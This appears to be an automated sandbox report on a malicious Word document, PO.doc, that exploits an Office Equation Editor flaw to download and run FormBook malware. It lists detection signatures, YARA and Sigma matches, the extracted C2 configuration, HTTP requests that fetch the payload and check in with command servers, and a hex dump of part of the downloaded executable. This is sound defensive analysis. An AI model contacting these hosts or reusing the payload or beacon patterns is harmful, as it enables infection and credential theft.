Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO.doc

Overview

General Information

Sample Name:PO.doc
Analysis ID:492582
MD5:601260b52c23f2be80998a22b2fc77dd
SHA1:e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
SHA256:2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 292 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2692 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ibeframnk863.exe (PID: 2800 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 1580 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • svchost.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • cmd.exe (PID: 2928 cmdline: /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.ibeframnk863.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.ibeframnk863.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.ibeframnk863.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        6.2.ibeframnk863.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.ibeframnk863.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 6 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2692, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2692, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibeframnk863.exe, NewProcessName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2692, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ProcessId: 2800
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.docVirustotal: Detection: 43%Perma Link
          Source: PO.docReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://fantecheo.tk/ibefrankszx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.handelsbetriebposavec.com/if60/Virustotal: Detection: 8%Perma Link
          Source: http://fantecheo.tk/ibefrankszx.exeVirustotal: Detection: 16%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeReversingLabs: Detection: 20%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeReversingLabs: Detection: 20%
          Source: 6.2.ibeframnk863.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp
          Source: global trafficDNS query: name: fantecheo.tk
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop ebx6_2_00407B1A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop edi6_2_00417D85
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop edi6_2_00417DBA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx8_2_00087B1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi8_2_00097D85
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi8_2_00097DBA
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 63.250.43.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.personowner.guru
          Source: C:\Windows\explorer.exeDomain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.handelsbetriebposavec.com/if60/
          Source: global trafficHTTP traffic detected: GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1Host: www.personowner.guruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1Host: www.audiofactaesthetic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 18:42:28 GMTContent-Type: application/x-msdownloadContent-Length: 624640Last-Modified: Tue, 28 Sep 2021 03:45:00 GMTConnection: keep-aliveETag: "61528fbc-98800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 85 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 0a 00 00 00 00 00 00 86 97 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 97 09 00 4f 00 00 00 00 a0 09 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 06 00 00 00 a0 09 00 00 08 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 97 09 00 00 00 00 00 48 00 00 00 02 00 05 00 70 f6 00 00 34 00 03 00 03 00 00 00 a3 01 00 06 a4 f6 03 00 90 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 1d 00 00 0a 2a 3a 02 28 1e 00 00 0a 02 03 7d 1d 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 02 00 00 1b 0a 06 2c 18 28 1f 00 00 0a 02 7b 1d 00 00 0a 06 7b 1d 00 00 0a 6f 20 00 00 0a 2b 01 16 2a 76 20 69 1f 79 45 20 29 55 55 a5 5a 28 1f 00 00 0a 02 7b 1d 00 00 0a 6f 21 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 13 00 00 01 25 16 02 7b 1d 00 00 0a 0a 12 00 12 01 fe 15 04 00 00 1b 07 8c 04 00 00 1b 2d 14 71 04 00 00 1b 0b 12 01 07 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 22 00 00 0a a2 28 23 00 00 0a 2a 00 00 00 13 30 03 00 19 00 00 00 03 00 00 11 00 7e 03 00 00 04 03 02 61 20 ff 00 00 00 5f 95 03 1e 64 61 0a 2b 00 06 2a 00 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 02 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 0e 00 00 00 03 00 00 11 00 02 03 d1 28 0a 00 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 3f 00 00 00 04 00 00 11 00 03 20 ff 00 00 00 5f d2 0a
          Source: global trafficHTTP traffic detected: GET /ibefrankszx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Tue, 28 Sep 2021 18:44:30 GMTtransfer-encoding: chunkedconnection: closeData Raw: 33 31 45 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 69 73 20 62 65 69 6e 67 20 63 72 65 61 74 65 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 